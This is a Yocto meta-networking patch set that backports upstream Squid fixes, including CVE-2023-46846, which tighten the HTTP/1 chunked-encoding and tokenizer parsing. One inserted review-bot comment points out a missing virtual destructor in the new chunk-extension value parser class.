+ bool +-Http::One::RequestParser::skipTrailingCrs(Http1::Tokenizer &tok) ++Http::One::RequestParser::skipTrailingCrs(Tokenizer &tok) + { + if (Config.onoff.relaxed_header_parser) { + (void)tok.skipAllTrailing(CharacterSet::CR); // optional; multiple OK +@@ -289,12 +289,12 @@ Http::One::RequestParser::parseRequestFi + // Earlier, skipGarbageLines() took care of any leading LFs (if allowed). + // Now, the request line has to end at the first LF. + static const CharacterSet lineChars = CharacterSet::LF.complement("notLF"); +- ::Parser::Tokenizer lineTok(buf_); ++ Tokenizer lineTok(buf_); + if (!lineTok.prefix(line, lineChars) || !lineTok.skip('\n')) { + if (buf_.length() >= Config.maxRequestHeaderSize) { + /* who should we blame for our failure to parse this line? */ + +- Http1::Tokenizer methodTok(buf_); ++ Tokenizer methodTok(buf_); + if (!parseMethodField(methodTok)) + return -1; // blame a bad method (or its delimiter) + +@@ -308,7 +308,7 @@ Http::One::RequestParser::parseRequestFi + return 0; + } + +- Http1::Tokenizer tok(line); ++ Tokenizer tok(line); + + if (!parseMethodField(tok)) + return -1; +--- a/src/http/one/RequestParser.h ++++ b/src/http/one/RequestParser.h +@@ -54,11 +54,11 @@ private: + bool doParse(const SBuf &aBuf); + + /* all these return false and set parseStatusCode on parsing failures */ +- bool parseMethodField(Http1::Tokenizer &); +- bool parseUriField(Http1::Tokenizer &); +- bool parseHttpVersionField(Http1::Tokenizer &); ++ bool parseMethodField(Tokenizer &); ++ bool parseUriField(Tokenizer &); ++ bool parseHttpVersionField(Tokenizer &); + bool skipDelimiter(const size_t count, const char *where); +- bool skipTrailingCrs(Http1::Tokenizer &tok); ++ bool skipTrailingCrs(Tokenizer &tok); + + bool http0() const {return !msgProtocol_.major;} + static const CharacterSet &RequestTargetCharacters(); +--- a/src/http/one/ResponseParser.cc ++++ b/src/http/one/ResponseParser.cc +@@ -9,8 +9,8 @@ + #include "squid.h" + #include "Debug.h" + #include 
"http/one/ResponseParser.h" +-#include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" ++#include "parser/Tokenizer.h" + #include "profiler/Profiler.h" + #include "SquidConfig.h" + +@@ -47,7 +47,7 @@ Http::One::ResponseParser::firstLineSize + // NP: we found the protocol version and consumed it already. + // just need the status code and reason phrase + int +-Http::One::ResponseParser::parseResponseStatusAndReason(Http1::Tokenizer &tok, const CharacterSet &WspDelim) ++Http::One::ResponseParser::parseResponseStatusAndReason(Tokenizer &tok, const CharacterSet &WspDelim) + { + if (!completedStatus_) { + debugs(74, 9, "seek status-code in: " << tok.remaining().substr(0,10) << "..."); +@@ -87,14 +87,13 @@ Http::One::ResponseParser::parseResponse + static const CharacterSet phraseChars = CharacterSet::WSP + CharacterSet::VCHAR + CharacterSet::OBSTEXT; + (void)tok.prefix(reasonPhrase_, phraseChars); // optional, no error if missing + try { +- if (skipLineTerminator(tok)) { +- debugs(74, DBG_DATA, "parse remaining buf={length=" << tok.remaining().length() << ", data='" << tok.remaining() << "'}"); +- buf_ = tok.remaining(); // resume checkpoint +- return 1; +- } ++ skipLineTerminator(tok); ++ buf_ = tok.remaining(); // resume checkpoint ++ debugs(74, DBG_DATA, Raw("leftovers", buf_.rawContent(), buf_.length())); ++ return 1; ++ } catch (const InsufficientInput &) { + reasonPhrase_.clear(); + return 0; // need more to be sure we have it all +- + } catch (const std::exception &ex) { + debugs(74, 6, "invalid status-line: " << ex.what()); + } +@@ -119,7 +118,7 @@ Http::One::ResponseParser::parseResponse + int + Http::One::ResponseParser::parseResponseFirstLine() + { +- Http1::Tokenizer tok(buf_); ++ Tokenizer tok(buf_); + + const CharacterSet &WspDelim = DelimiterCharacters(); + +--- a/src/http/one/ResponseParser.h ++++ b/src/http/one/ResponseParser.h +@@ -43,7 +43,7 @@ public: + + private: + int parseResponseFirstLine(); +- int 
parseResponseStatusAndReason(Http1::Tokenizer&, const CharacterSet &); ++ int parseResponseStatusAndReason(Tokenizer&, const CharacterSet &); + + /// magic prefix for identifying ICY response messages + static const SBuf IcyMagic; +--- a/src/http/one/TeChunkedParser.cc ++++ b/src/http/one/TeChunkedParser.cc +@@ -13,10 +13,13 @@ + #include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" + #include "MemBuf.h" ++#include "parser/Tokenizer.h" + #include "Parsing.h" ++#include "sbuf/Stream.h" + #include "SquidConfig.h" + +-Http::One::TeChunkedParser::TeChunkedParser() ++Http::One::TeChunkedParser::TeChunkedParser(): ++ customExtensionValueParser(nullptr) + { + // chunked encoding only exists in HTTP/1.1 + Http1::Parser::msgProtocol_ = Http::ProtocolVersion(1,1); +@@ -31,7 +34,11 @@ Http::One::TeChunkedParser::clear() + buf_.clear(); + theChunkSize = theLeftBodySize = 0; + theOut = NULL; +- useOriginBody = -1; ++ // XXX: We do not reset customExtensionValueParser here. Based on the ++ // clear() API description, we must, but it makes little sense and could ++ // break method callers if they appear because some of them may forget to ++ // reset customExtensionValueParser. TODO: Remove Http1::Parser as our ++ // parent class and this unnecessary method with it. 
+ } + + bool +@@ -49,14 +56,14 @@ Http::One::TeChunkedParser::parse(const + if (parsingStage_ == Http1::HTTP_PARSE_NONE) + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; + +- Http1::Tokenizer tok(buf_); ++ Tokenizer tok(buf_); + + // loop for as many chunks as we can + // use do-while instead of while so that we can incrementally + // restart in the middle of a chunk/frame + do { + +- if (parsingStage_ == Http1::HTTP_PARSE_CHUNK_EXT && !parseChunkExtension(tok, theChunkSize)) ++ if (parsingStage_ == Http1::HTTP_PARSE_CHUNK_EXT && !parseChunkMetadataSuffix(tok)) + return false; + + if (parsingStage_ == Http1::HTTP_PARSE_CHUNK && !parseChunkBody(tok)) +@@ -80,7 +87,7 @@ Http::One::TeChunkedParser::needsMoreSpa + + /// RFC 7230 section 4.1 chunk-size + bool +-Http::One::TeChunkedParser::parseChunkSize(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkSize(Tokenizer &tok) + { + Must(theChunkSize <= 0); // Should(), really + +@@ -104,66 +111,75 @@ Http::One::TeChunkedParser::parseChunkSi + return false; // should not be reachable + } + +-/** +- * Parses chunk metadata suffix, looking for interesting extensions and/or +- * getting to the line terminator. RFC 7230 section 4.1.1 and its Errata #4667: +- * +- * chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) +- * chunk-ext-name = token +- * chunk-ext-val = token / quoted-string +- * +- * ICAP 'use-original-body=N' extension is supported. +- */ +-bool +-Http::One::TeChunkedParser::parseChunkExtension(Http1::Tokenizer &tok, bool skipKnown) +-{ +- SBuf ext; +- SBuf value; +- while ( +- ParseBws(tok) && // Bug 4492: IBM_HTTP_Server sends SP after chunk-size +- tok.skip(';') && +- ParseBws(tok) && // Bug 4492: ICAP servers send SP before chunk-ext-name +- tok.prefix(ext, CharacterSet::TCHAR)) { // chunk-ext-name +- +- // whole value part is optional. 
if no '=' expect next chunk-ext +- if (ParseBws(tok) && tok.skip('=') && ParseBws(tok)) { +- +- if (!skipKnown) { +- if (ext.cmp("use-original-body",17) == 0 && tok.int64(useOriginBody, 10)) { +- debugs(94, 3, "Found chunk extension " << ext << "=" << useOriginBody); +- buf_ = tok.remaining(); // parse checkpoint +- continue; +- } +- } +- +- debugs(94, 5, "skipping unknown chunk extension " << ext); +- +- // unknown might have a value token or quoted-string +- if (tok.quotedStringOrToken(value) && !tok.atEnd()) { +- buf_ = tok.remaining(); // parse checkpoint +- continue; +- } +- +- // otherwise need more data OR corrupt syntax +- break; +- } +- +- if (!tok.atEnd()) +- buf_ = tok.remaining(); // parse checkpoint (unless there might be more token name) +- } +- +- if (skipLineTerminator(tok)) { +- buf_ = tok.remaining(); // checkpoint +- // non-0 chunk means data, 0-size means optional Trailer follows ++/// Parses "[chunk-ext] CRLF" from RFC 7230 section 4.1.1: ++/// chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF ++/// last-chunk = 1*"0" [ chunk-ext ] CRLF ++bool ++Http::One::TeChunkedParser::parseChunkMetadataSuffix(Tokenizer &tok) ++{ ++ // Code becomes much simpler when incremental parsing functions throw on ++ // bad or insufficient input, like in the code below. TODO: Expand up. ++ try { ++ parseChunkExtensions(tok); // a possibly empty chunk-ext list ++ skipLineTerminator(tok); ++ buf_ = tok.remaining(); + parsingStage_ = theChunkSize ? 
Http1::HTTP_PARSE_CHUNK : Http1::HTTP_PARSE_MIME; + return true; ++ } catch (const InsufficientInput &) { ++ tok.reset(buf_); // backtrack to the last commit point ++ return false; + } ++ // other exceptions bubble up to kill message parsing ++} ++ ++/// Parses the chunk-ext list (RFC 7230 section 4.1.1 and its Errata #4667): ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++void ++Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &tok) ++{ ++ do { ++ ParseBws(tok); // Bug 4492: IBM_HTTP_Server sends SP after chunk-size + +- return false; ++ if (!tok.skip(';')) ++ return; // reached the end of extensions (if any) ++ ++ parseOneChunkExtension(tok); ++ buf_ = tok.remaining(); // got one extension ++ } while (true); ++} ++ ++void ++Http::One::ChunkExtensionValueParser::Ignore(Tokenizer &tok, const SBuf &extName) ++{ ++ const auto ignoredValue = tokenOrQuotedString(tok); ++ debugs(94, 5, extName << " with value " << ignoredValue); ++} ++ ++/// Parses a single chunk-ext list element: ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++void ++Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &tok) ++{ ++ ParseBws(tok); // Bug 4492: ICAP servers send SP before chunk-ext-name ++ ++ const auto extName = tok.prefix("chunk-ext-name", CharacterSet::TCHAR); ++ ++ ParseBws(tok); ++ ++ if (!tok.skip('=')) ++ return; // parsed a valueless chunk-ext ++ ++ ParseBws(tok); ++ ++ // optimization: the only currently supported extension needs last-chunk ++ if (!theChunkSize && customExtensionValueParser) ++ customExtensionValueParser->parse(tok, extName); ++ else ++ ChunkExtensionValueParser::Ignore(tok, extName); + } + + bool +-Http::One::TeChunkedParser::parseChunkBody(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkBody(Tokenizer &tok) + { + if (theLeftBodySize > 0) { + buf_ = tok.remaining(); // sync buffers before buf_ use +@@ -188,17 +204,20 @@ Http::One::TeChunkedParser::parseChunkBo + 
} + + bool +-Http::One::TeChunkedParser::parseChunkEnd(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkEnd(Tokenizer &tok) + { + Must(theLeftBodySize == 0); // Should(), really + +- if (skipLineTerminator(tok)) { ++ try { ++ skipLineTerminator(tok); + buf_ = tok.remaining(); // parse checkpoint + theChunkSize = 0; // done with the current chunk + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; + return true; + } +- +- return false; ++ catch (const InsufficientInput &) { ++ return false; ++ } ++ // other exceptions bubble up to kill message parsing + } + +--- a/src/http/one/TeChunkedParser.h ++++ b/src/http/one/TeChunkedParser.h +@@ -18,6 +18,26 @@ namespace Http + namespace One + { + ++using ::Parser::InsufficientInput; ++ ++// TODO: Move this class into http/one/ChunkExtensionValueParser.* ++/// A customizable parser of a single chunk extension value (chunk-ext-val). ++/// From RFC 7230 section 4.1.1 and its Errata #4667: ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++/// chunk-ext-name = token ++/// chunk-ext-val = token / quoted-string ++class ChunkExtensionValueParser ++{ ++public: ++ typedef ::Parser::Tokenizer Tokenizer; ++ ++ /// extracts and ignores the value of a named extension ++ static void Ignore(Tokenizer &tok, const SBuf &extName); ++ ++ /// extracts and then interprets (or ignores) the extension value ++ virtual void parse(Tokenizer &tok, const SBuf &extName) = 0; ++}; ++ + /** + * An incremental parser for chunked transfer coding + * defined in RFC 7230 section 4.1. +@@ -25,7 +45,7 @@ namespace One + * + * The parser shovels content bytes from the raw + * input buffer into the content output buffer, both caller-supplied. +- * Ignores chunk extensions except for ICAP's ieof. ++ * Chunk extensions like use-original-body are handled via parseExtensionValuesWith(). + * Trailers are available via mimeHeader() if wanted. 
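Review bot: `ChunkExtensionValueParser` in the TeChunkedParser.h hunk at `@@ -18,6 +18,26 @@` is a polymorphic base with a pure virtual `parse()` but no declared destructor, so destroying a derived parser through a base pointer would be undefined behaviour. The visible use keeps the derived object as a `ModXact` member and passes `&extensionParser`, so nothing deletes through the base today, but the class should make that safe with `virtual ~ChunkExtensionValueParser() = default;`. `TeChunkedParser` only borrows the raw pointer, and `clear()` deliberately leaves it set. A one-line comment on `parseExtensionValuesWith()` saying the supplied parser must outlive the chunk parser would document the lifetime requirement for future callers.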
+ */ + class TeChunkedParser : public Http1::Parser +@@ -37,6 +57,10 @@ public: + /// set the buffer to be used to store decoded chunk data + void setPayloadBuffer(MemBuf *parsedContent) {theOut = parsedContent;} + ++ /// Instead of ignoring all chunk extension values, give the supplied ++ /// parser a chance to handle them. Only applied to last-chunk (for now). ++ void parseExtensionValuesWith(ChunkExtensionValueParser *parser) { customExtensionValueParser = parser; } ++ + bool needsMoreSpace() const; + + /* Http1::Parser API */ +@@ -45,17 +69,20 @@ public: + virtual Parser::size_type firstLineSize() const {return 0;} // has no meaning with multiple chunks + + private: +- bool parseChunkSize(Http1::Tokenizer &tok); +- bool parseChunkExtension(Http1::Tokenizer &tok, bool skipKnown); +- bool parseChunkBody(Http1::Tokenizer &tok); +- bool parseChunkEnd(Http1::Tokenizer &tok); ++ bool parseChunkSize(Tokenizer &tok); ++ bool parseChunkMetadataSuffix(Tokenizer &); ++ void parseChunkExtensions(Tokenizer &); ++ void parseOneChunkExtension(Tokenizer &); ++ bool parseChunkBody(Tokenizer &tok); ++ bool parseChunkEnd(Tokenizer &tok); + + MemBuf *theOut; + uint64_t theChunkSize; + uint64_t theLeftBodySize; + +-public: +- int64_t useOriginBody; ++ /// An optional plugin for parsing and interpreting custom chunk-ext-val. ++ /// This "visitor" object is owned by our creator. ++ ChunkExtensionValueParser *customExtensionValueParser; + }; + + } // namespace One +--- a/src/http/one/Tokenizer.cc ++++ b/src/http/one/Tokenizer.cc +@@ -8,35 +8,18 @@ + + #include "squid.h" + #include "Debug.h" ++#include "http/one/Parser.h" + #include "http/one/Tokenizer.h" ++#include "parser/Tokenizer.h" ++#include "sbuf/Stream.h" + +-bool +-Http::One::Tokenizer::quotedString(SBuf &returnedToken, const bool http1p0) ++/// Extracts quoted-string after the caller removes the initial '"'. 
++/// \param http1p0 whether to prohibit \-escaped characters in quoted strings ++/// \throws InsufficientInput when input can be a token _prefix_ ++/// \returns extracted quoted string (without quotes and with chars unescaped) ++static SBuf ++parseQuotedStringSuffix(Parser::Tokenizer &tok, const bool http1p0) + { +- checkpoint(); +- +- if (!skip('"')) +- return false; +- +- return qdText(returnedToken, http1p0); +-} +- +-bool +-Http::One::Tokenizer::quotedStringOrToken(SBuf &returnedToken, const bool http1p0) +-{ +- checkpoint(); +- +- if (!skip('"')) +- return prefix(returnedToken, CharacterSet::TCHAR); +- +- return qdText(returnedToken, http1p0); +-} +- +-bool +-Http::One::Tokenizer::qdText(SBuf &returnedToken, const bool http1p0) +-{ +- // the initial DQUOTE has been skipped by the caller +- + /* + * RFC 1945 - defines qdtext: + * inclusive of LWS (which includes CR and LF) +@@ -61,12 +44,17 @@ Http::One::Tokenizer::qdText(SBuf &retur + // best we can do is a conditional reference since http1p0 value may change per-client + const CharacterSet &tokenChars = (http1p0 ? 
qdtext1p0 : qdtext1p1); + +- for (;;) { +- SBuf::size_type prefixLen = buf().findFirstNotOf(tokenChars); +- returnedToken.append(consume(prefixLen)); ++ SBuf parsedToken; ++ ++ while (!tok.atEnd()) { ++ SBuf qdText; ++ if (tok.prefix(qdText, tokenChars)) ++ parsedToken.append(qdText); ++ ++ if (!http1p0 && tok.skip('\\')) { // HTTP/1.1 allows quoted-pair, HTTP/1.0 does not ++ if (tok.atEnd()) ++ break; + +- // HTTP/1.1 allows quoted-pair, HTTP/1.0 does not +- if (!http1p0 && skip('\\')) { + /* RFC 7230 section 3.2.6 + * + * The backslash octet ("\") can be used as a single-octet quoting +@@ -78,32 +66,42 @@ Http::One::Tokenizer::qdText(SBuf &retur + */ + static const CharacterSet qPairChars = CharacterSet::HTAB + CharacterSet::SP + CharacterSet::VCHAR + CharacterSet::OBSTEXT; + SBuf escaped; +- if (!prefix(escaped, qPairChars, 1)) { +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; +- } +- returnedToken.append(escaped); ++ if (!tok.prefix(escaped, qPairChars, 1)) ++ throw TexcHere("invalid escaped character in quoted-pair"); ++ ++ parsedToken.append(escaped); + continue; ++ } + +- } else if (skip('"')) { +- break; // done ++ if (tok.skip('"')) ++ return parsedToken; // may be empty + +- } else if (atEnd()) { +- // need more data +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; +- } ++ if (tok.atEnd()) ++ break; + +- // else, we have an error +- debugs(24, 8, "invalid bytes for set " << tokenChars.name); +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; ++ throw TexcHere(ToSBuf("invalid bytes for set ", tokenChars.name)); + } + +- // found the whole string +- return true; ++ throw Http::One::InsufficientInput(); ++} ++ ++SBuf ++Http::One::tokenOrQuotedString(Parser::Tokenizer &tok, const bool http1p0) ++{ ++ if (tok.skip('"')) ++ return parseQuotedStringSuffix(tok, http1p0); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); ++ ++ SBuf parsedToken; ++ if (!tok.prefix(parsedToken, CharacterSet::TCHAR)) 
++ throw TexcHere("invalid input while expecting an HTTP token"); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); ++ ++ // got the complete token ++ return parsedToken; + } + +--- a/src/http/one/Tokenizer.h ++++ b/src/http/one/Tokenizer.h +@@ -9,68 +9,47 @@ + #ifndef SQUID_SRC_HTTP_ONE_TOKENIZER_H + #define SQUID_SRC_HTTP_ONE_TOKENIZER_H + +-#include "parser/Tokenizer.h" ++#include "parser/forward.h" ++#include "sbuf/forward.h" + + namespace Http { + namespace One { + + /** +- * Lexical processor extended to tokenize HTTP/1.x syntax. ++ * Extracts either an HTTP/1 token or quoted-string while dealing with ++ * possibly incomplete input typical for incremental text parsers. ++ * Unescapes escaped characters in HTTP/1.1 quoted strings. + * +- * \see ::Parser::Tokenizer for more detail ++ * \param http1p0 whether to prohibit \-escaped characters in quoted strings ++ * \throws InsufficientInput as appropriate, including on unterminated tokens ++ * \returns extracted token or quoted string (without quotes) ++ * ++ * Governed by: ++ * - RFC 1945 section 2.1 ++ * " ++ * A string of text is parsed as a single word if it is quoted using ++ * double-quote marks. ++ * ++ * quoted-string = ( <"> *(qdtext) <"> ) ++ * ++ * qdtext = <any CHAR except <"> and CTLs, ++ * but including LWS> ++ * ++ * Single-character quoting using the backslash ("\") character is not ++ * permitted in HTTP/1.0. ++ * " ++ * ++ * - RFC 7230 section 3.2.6 ++ * " ++ * A string of text is parsed as a single value if it is quoted using ++ * double-quote marks. ++ * ++ * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE ++ * qdtext = HTAB / SP /%x21 / %x23-5B / %x5D-7E / obs-text ++ * obs-text = %x80-FF ++ * " + */ +-class Tokenizer : public ::Parser::Tokenizer +-{ +-public: +- Tokenizer(SBuf &s) : ::Parser::Tokenizer(s), savedStats_(0) {} +- +- /** +- * Attempt to parse a quoted-string lexical construct. 
+- * +- * Governed by: +- * - RFC 1945 section 2.1 +- * " +- * A string of text is parsed as a single word if it is quoted using +- * double-quote marks. +- * +- * quoted-string = ( <"> *(qdtext) <"> ) +- * +- * qdtext = <any CHAR except <"> and CTLs, +- * but including LWS> +- * +- * Single-character quoting using the backslash ("\") character is not +- * permitted in HTTP/1.0. +- * " +- * +- * - RFC 7230 section 3.2.6 +- * " +- * A string of text is parsed as a single value if it is quoted using +- * double-quote marks. +- * +- * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE +- * qdtext = HTAB / SP /%x21 / %x23-5B / %x5D-7E / obs-text +- * obs-text = %x80-FF +- * " +- * +- * \param escaped HTTP/1.0 does not permit \-escaped characters +- */ +- bool quotedString(SBuf &value, const bool http1p0 = false); +- +- /** +- * Attempt to parse a (token / quoted-string ) lexical construct. +- */ +- bool quotedStringOrToken(SBuf &value, const bool http1p0 = false); +- +-private: +- /// parse the internal component of a quote-string, and terminal DQUOTE +- bool qdText(SBuf &value, const bool http1p0); +- +- void checkpoint() { savedCheckpoint_ = buf(); savedStats_ = parsedSize(); } +- void restoreLastCheckpoint() { undoParse(savedCheckpoint_, savedStats_); } +- +- SBuf savedCheckpoint_; +- SBuf::size_type savedStats_; +-}; ++SBuf tokenOrQuotedString(Parser::Tokenizer &tok, const bool http1p0 = false); + + } // namespace One + } // namespace Http +--- a/src/http/one/forward.h ++++ b/src/http/one/forward.h +@@ -10,6 +10,7 @@ + #define SQUID_SRC_HTTP_ONE_FORWARD_H + + #include "base/RefCount.h" ++#include "parser/forward.h" + #include "sbuf/forward.h" + + namespace Http { +@@ -31,6 +32,8 @@ typedef RefCount<Http::One::ResponsePars + /// CRLF textual representation + const SBuf &CrLf(); + ++using ::Parser::InsufficientInput; ++ + } // namespace One + } // namespace Http + +--- a/src/parser/BinaryTokenizer.h ++++ b/src/parser/BinaryTokenizer.h +@@ -9,6 +9,7 @@ + #ifndef 
SQUID_SRC_PARSER_BINARYTOKENIZER_H + #define SQUID_SRC_PARSER_BINARYTOKENIZER_H + ++#include "parser/forward.h" + #include "sbuf/SBuf.h" + + namespace Parser +@@ -44,7 +45,7 @@ public: + class BinaryTokenizer + { + public: +- class InsufficientInput {}; // thrown when a method runs out of data ++ typedef ::Parser::InsufficientInput InsufficientInput; + typedef uint64_t size_type; // enough for the largest supported offset + + BinaryTokenizer(); +--- a/src/parser/Makefile.am ++++ b/src/parser/Makefile.am +@@ -13,6 +13,7 @@ noinst_LTLIBRARIES = libparser.la + libparser_la_SOURCES = \ + BinaryTokenizer.h \ + BinaryTokenizer.cc \ ++ forward.h \ + Tokenizer.h \ + Tokenizer.cc + +--- a/src/parser/Tokenizer.cc ++++ b/src/parser/Tokenizer.cc +@@ -10,7 +10,9 @@ + + #include "squid.h" + #include "Debug.h" ++#include "parser/forward.h" + #include "parser/Tokenizer.h" ++#include "sbuf/Stream.h" + + #include <cerrno> + #if HAVE_CTYPE_H +@@ -96,6 +98,23 @@ Parser::Tokenizer::prefix(SBuf &returned + return true; + } + ++SBuf ++Parser::Tokenizer::prefix(const char *description, const CharacterSet &tokenChars, const SBuf::size_type limit) ++{ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ SBuf result; ++ ++ if (!prefix(result, tokenChars, limit)) ++ throw TexcHere(ToSBuf("cannot parse ", description)); ++ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ return result; ++} ++ + bool + Parser::Tokenizer::suffix(SBuf &returnedToken, const CharacterSet &tokenChars, const SBuf::size_type limit) + { +@@ -283,3 +302,24 @@ Parser::Tokenizer::int64(int64_t & resul + return success(s - range.rawContent()); + } + ++int64_t ++Parser::Tokenizer::udec64(const char *description, const SBuf::size_type limit) ++{ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ int64_t result = 0; ++ ++ // Since we only support unsigned decimals, a parsing failure with a ++ // non-empty input always implies invalid/malformed input (or a buggy ++ // limit=0 caller). 
TODO: Support signed and non-decimal integers by ++ // refactoring int64() to detect insufficient input. ++ if (!int64(result, 10, false, limit)) ++ throw TexcHere(ToSBuf("cannot parse ", description)); ++ ++ if (atEnd()) ++ throw InsufficientInput(); // more digits may be coming ++ ++ return result; ++} ++ +--- a/src/parser/Tokenizer.h ++++ b/src/parser/Tokenizer.h +@@ -143,6 +143,19 @@ public: + */ + bool int64(int64_t &result, int base = 0, bool allowSign = true, SBuf::size_type limit = SBuf::npos); + ++ /* ++ * The methods below mimic their counterparts documented above, but they ++ * throw on errors, including InsufficientInput. The field description ++ * parameter is used for error reporting and debugging. ++ */ ++ ++ /// prefix() wrapper but throws InsufficientInput if input contains ++ /// nothing but the prefix (i.e. if the prefix is not "terminated") ++ SBuf prefix(const char *description, const CharacterSet &tokenChars, SBuf::size_type limit = SBuf::npos); ++ ++ /// int64() wrapper but limited to unsigned decimal integers (for now) ++ int64_t udec64(const char *description, SBuf::size_type limit = SBuf::npos); ++ + protected: + SBuf consume(const SBuf::size_type n); + SBuf::size_type success(const SBuf::size_type n); +--- /dev/null ++++ b/src/parser/forward.h +@@ -0,0 +1,22 @@ ++/* ++ * Copyright (C) 1996-2019 The Squid Software Foundation and contributors ++ * ++ * Squid software is distributed under GPLv2+ license and includes ++ * contributions from numerous individuals and organizations. ++ * Please see the COPYING and CONTRIBUTORS files for details. ++ */ ++ ++#ifndef SQUID_PARSER_FORWARD_H ++#define SQUID_PARSER_FORWARD_H ++ ++namespace Parser { ++class Tokenizer; ++class BinaryTokenizer; ++ ++// TODO: Move this declaration (to parser/Elements.h) if we need more like it. ++/// thrown by modern "incremental" parsers when they need more data ++class InsufficientInput {}; ++} // namespace Parser ++ ++#endif /* SQUID_PARSER_FORWARD_H */ ++ 
diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch
new file mode 100644
index 0000000000..a6d0965e7a
--- /dev/null
+++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch
@@ -0,0 +1,169 @@ +From 05f6af2f4c85cc99323cfff6149c3d74af661b6d Mon Sep 17 00:00:00 2001 +From: Amos Jeffries <yadij@users.noreply.github.com> +Date: Fri, 13 Oct 2023 08:44:16 +0000 +Subject: [PATCH] RFC 9112: Improve HTTP chunked encoding compliance (#1498) + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46846.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/05f6af2f4c85cc99323cfff6149c3d74af661b6d] +CVE: CVE-2023-46846 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/http/one/Parser.cc | 8 +------- + src/http/one/Parser.h | 4 +--- + src/http/one/TeChunkedParser.cc | 23 ++++++++++++++++++----- + src/parser/Tokenizer.cc | 12 ++++++++++++ + src/parser/Tokenizer.h | 7 +++++++ + 5 files changed, 39 insertions(+), 15 deletions(-) + +--- a/src/http/one/Parser.cc ++++ b/src/http/one/Parser.cc +@@ -65,16 +65,10 @@ Http::One::Parser::DelimiterCharacters() + void + Http::One::Parser::skipLineTerminator(Tokenizer &tok) const + { +- if (tok.skip(Http1::CrLf())) +- return; +- + if (Config.onoff.relaxed_header_parser && tok.skipOne(CharacterSet::LF)) + return; + +- if (tok.atEnd() || (tok.remaining().length() == 1 && tok.remaining().at(0) == '\r')) +- throw InsufficientInput(); +- +- throw TexcHere("garbage instead of CRLF line terminator"); ++ tok.skipRequired("line-terminating CRLF", Http1::CrLf()); + } + + /// all characters except the LF line terminator +--- a/src/http/one/Parser.h ++++ b/src/http/one/Parser.h +@@ -120,9 +120,7 @@ protected: + * detect and skip the CRLF or (if tolerant) LF line terminator + * consume from the tokenizer. + * +- * \throws exception on bad or InsuffientInput. +- * \retval true only if line terminator found. +- * \retval false incomplete or missing line terminator, need more data. 
++ * \throws exception on bad or InsufficientInput + */ + void skipLineTerminator(Tokenizer &) const; + +--- a/src/http/one/TeChunkedParser.cc ++++ b/src/http/one/TeChunkedParser.cc +@@ -91,6 +91,11 @@ Http::One::TeChunkedParser::parseChunkSi + { + Must(theChunkSize <= 0); // Should(), really + ++ static const SBuf bannedHexPrefixLower("0x"); ++ static const SBuf bannedHexPrefixUpper("0X"); ++ if (tok.skip(bannedHexPrefixLower) || tok.skip(bannedHexPrefixUpper)) ++ throw TextException("chunk starts with 0x", Here()); ++ + int64_t size = -1; + if (tok.int64(size, 16, false) && !tok.atEnd()) { + if (size < 0) +@@ -121,7 +126,7 @@ Http::One::TeChunkedParser::parseChunkMe + // bad or insufficient input, like in the code below. TODO: Expand up. + try { + parseChunkExtensions(tok); // a possibly empty chunk-ext list +- skipLineTerminator(tok); ++ tok.skipRequired("CRLF after [chunk-ext]", Http1::CrLf()); + buf_ = tok.remaining(); + parsingStage_ = theChunkSize ? Http1::HTTP_PARSE_CHUNK : Http1::HTTP_PARSE_MIME; + return true; +@@ -132,12 +137,14 @@ Http::One::TeChunkedParser::parseChunkMe + // other exceptions bubble up to kill message parsing + } + +-/// Parses the chunk-ext list (RFC 7230 section 4.1.1 and its Errata #4667): ++/// Parses the chunk-ext list (RFC 9112 section 7.1.1: + /// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) + void +-Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &callerTok) + { + do { ++ auto tok = callerTok; ++ + ParseBws(tok); // Bug 4492: IBM_HTTP_Server sends SP after chunk-size + + if (!tok.skip(';')) +@@ -145,6 +152,7 @@ Http::One::TeChunkedParser::parseChunkEx + + parseOneChunkExtension(tok); + buf_ = tok.remaining(); // got one extension ++ callerTok = tok; + } while (true); + } + +@@ -158,11 +166,14 @@ Http::One::ChunkExtensionValueParser::Ig + /// Parses a single chunk-ext list element: + /// chunk-ext = *( BWS ";" BWS 
